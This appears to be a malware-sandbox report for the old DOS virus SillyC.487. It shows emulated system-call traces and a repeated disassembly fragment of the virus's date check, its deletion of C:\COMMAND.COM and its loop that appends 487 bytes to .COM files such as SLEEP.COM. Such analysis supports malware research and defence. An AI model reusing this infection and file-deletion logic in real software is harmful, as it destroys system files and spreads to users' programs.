Sample viewer

vx.netlux.org/Virus.DOS.SillyC.487

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T23:10:26.029905291Z	42	PC: 12ee3 \| Get date 0x12ee3: cmp dx, 0x61d 0x12ee7: jl 0x12ef2 0x12ee9: lea dx, word ptr [bp + 0x137] 0x12eed: mov ah, 0x41 0x12eef: int 0x21 0x12ef1: ret 0x12ef2: call 0x22e68 0x12ef5: mov ah, 0x4e 0x12ef7: mov cx, 0x27 0x12efa: lea dx, word ptr [bp + 0x131] 0x12efe: int 0x21 0x12f00: jae 0x12f0e 0x12f02: jmp 0x12fe1 0x12f05: mov ah, 0x4f 0x12f07: int 0x21 0x12f09: jae 0x12f0e 0x12f0b: jmp 0x12fe1 0x12f0e: mov ax, word ptr [bp + 0x120] 0x12f12: cmp ax, 0xfe0b 0x12f15: ja 0x12f05
2018-12-17T23:10:26.033034047Z	65	PC: 12ef1 \| Delete file (Filename = 'C:\COMMAND.COM')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16854,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:54:06.019262665Z	42	PC: 12ee3 \| Get date 0x12ee3: cmp dx, 0x61d 0x12ee7: jl 0x12ef2 0x12ee9: lea dx, word ptr [bp + 0x137] 0x12eed: mov ah, 0x41 0x12eef: int 0x21 0x12ef1: ret 0x12ef2: call 0x22e68 0x12ef5: mov ah, 0x4e 0x12ef7: mov cx, 0x27 0x12efa: lea dx, word ptr [bp + 0x131] 0x12efe: int 0x21 0x12f00: jae 0x12f0e 0x12f02: jmp 0x12fe1 0x12f05: mov ah, 0x4f 0x12f07: int 0x21 0x12f09: jae 0x12f0e 0x12f0b: jmp 0x12fe1 0x12f0e: mov ax, word ptr [bp + 0x120] 0x12f12: cmp ax, 0xfe0b 0x12f15: ja 0x12f05
2018-12-25T12:54:06.021865916Z	26	PC: 12e91 \| Set disk transfer address
2018-12-25T12:54:06.023928115Z	78	PC: 12f00 \| Find first file
2018-12-25T12:54:06.030674387Z	67	PC: 12eb5 \| Get or set file attributes
2018-12-25T12:54:06.049309212Z	61	PC: 12f2f \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:06.057595162Z	66	PC: 12f42 \| Move file pointer
2018-12-25T12:54:06.059206509Z	63	PC: 12f4f \| Read file or device (Read 6 bytes on handle 5)
2018-12-25T12:54:06.067202981Z	66	PC: 12f6f \| Move file pointer
2018-12-25T12:54:06.069758635Z	64	PC: 12f7c \| Write file or device (Write 6 bytes on handle 5)
2018-12-25T12:54:06.073111909Z	66	PC: 12f8a \| Move file pointer
2018-12-25T12:54:06.075668475Z	64	PC: 12faa \| Write file or device (Write 487 bytes on handle 5)
2018-12-25T12:54:06.286492934Z	87	PC: 12fbc \| Get or set file date and time
2018-12-25T12:54:06.288404363Z	62	PC: 12fc4 \| Close file
2018-12-25T12:54:06.42247375Z	67	PC: 12fde \| Get or set file attributes
2018-12-25T12:54:06.437437238Z	79	PC: 12f09 \| Find next file
2018-12-25T12:54:06.445199589Z	79	PC: 12f09 \| Find next file (See above)
2018-12-25T12:54:06.48060796Z	79	PC: 12f09 \| Find next file (See above)
2018-12-25T12:54:06.483454247Z	79	PC: 12f09 \| Find next file (See above)
2018-12-25T12:54:06.487073146Z	79	PC: 12f09 \| Find next file (See above)
2018-12-25T12:54:06.489926211Z	67	PC: 12eb5 \| Get or set file attributes (See above)
2018-12-25T12:54:06.499613031Z	61	PC: 12f2f \| Open file (See above)
2018-12-25T12:54:06.508878161Z	66	PC: 12f42 \| Move file pointer (See above)
2018-12-25T12:54:06.512673819Z	63	PC: 12f4f \| Read file or device (See above)
2018-12-25T12:54:06.53191494Z	66	PC: 12f6f \| Move file pointer (See above)
2018-12-25T12:54:06.534878842Z	64	PC: 12f7c \| Write file or device (See above)
2018-12-25T12:54:06.538607466Z	66	PC: 12f8a \| Move file pointer (See above)
2018-12-25T12:54:06.541175171Z	64	PC: 12faa \| Write file or device (See above)
2018-12-25T12:54:06.551400883Z	87	PC: 12fbc \| Get or set file date and time (See above)
2018-12-25T12:54:06.553845726Z	62	PC: 12fc4 \| Close file (See above)
2018-12-25T12:54:06.563495277Z	67	PC: 12fde \| Get or set file attributes (See above)
2018-12-25T12:54:06.574952707Z	79	PC: 12f09 \| Find next file (See above)
2018-12-25T12:54:06.578972298Z	79	PC: 12f09 \| Find next file (See above)
2018-12-25T12:54:06.582091435Z	67	PC: 12eb5 \| Get or set file attributes (See above)
2018-12-25T12:54:06.593137955Z	61	PC: 12f2f \| Open file (See above)
2018-12-25T12:54:06.601994907Z	66	PC: 12f42 \| Move file pointer (See above)
2018-12-25T12:54:06.603836567Z	63	PC: 12f4f \| Read file or device (See above)
2018-12-25T12:54:06.616704714Z	87	PC: 12fbc \| Get or set file date and time (See above)
2018-12-25T12:54:06.61932615Z	62	PC: 12fc4 \| Close file (See above)
2018-12-25T12:54:06.625864417Z	67	PC: 12fde \| Get or set file attributes (See above)
2018-12-25T12:54:06.6370586Z	79	PC: 12f09 \| Find next file (See above)
2018-12-25T12:54:06.640879332Z	26	PC: 12fe8 \| Set disk transfer address

{"DateBased":true,"Day":29,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16854,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:54:06.049556874Z	42	PC: 12ee3 \| Get date 0x12ee3: cmp dx, 0x61d 0x12ee7: jl 0x12ef2 0x12ee9: lea dx, word ptr [bp + 0x137] 0x12eed: mov ah, 0x41 0x12eef: int 0x21 0x12ef1: ret 0x12ef2: call 0x22e68 0x12ef5: mov ah, 0x4e 0x12ef7: mov cx, 0x27 0x12efa: lea dx, word ptr [bp + 0x131] 0x12efe: int 0x21 0x12f00: jae 0x12f0e 0x12f02: jmp 0x12fe1 0x12f05: mov ah, 0x4f 0x12f07: int 0x21 0x12f09: jae 0x12f0e 0x12f0b: jmp 0x12fe1 0x12f0e: mov ax, word ptr [bp + 0x120] 0x12f12: cmp ax, 0xfe0b 0x12f15: ja 0x12f05
2018-12-25T12:54:06.052642893Z	65	PC: 12ef1 \| Delete file (Filename = 'C:\COMMAND.COM')